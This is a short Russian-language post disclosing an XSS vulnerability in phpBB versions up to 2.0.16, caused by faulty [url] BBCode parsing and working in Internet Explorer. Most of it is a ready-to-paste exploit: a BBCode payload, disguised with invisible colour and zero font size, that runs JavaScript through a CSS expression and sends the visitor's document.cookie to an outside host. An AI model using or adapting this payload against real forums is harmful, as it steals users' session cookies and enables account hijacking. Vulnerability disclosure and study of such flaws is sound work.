XSS уязвимость в форуме phpBB <=2.016
Уровень угрозы и масштаб применения уязвимости
* XSS уязвимость. Предполагает возможность внедрения произвольного Javascript кода и может быть использована в частности для похищения конфиденциальной информации пользователя (идентификатор сессии или куки).
* Уязвимость распространяется на все версии браузера Internet Explorer. На других браузерах сплоит скорее всего работать не будет.
Суть уязвимости
Выполнение Javascript'а на пользовательской машине возможно из-за некорректной работы регулярных выражений парсинга bb-кодов [url].
Пример эксплоита
[color=#FDDFEB][url]www.ut[url=www.s=''style='font-size:0;color:#FDDFEB'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://comp-info.ru/pic/image.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
Автор статьи: Zadoxlik
Нашел уязвимость: Zadoxlik
далее читаем тут..
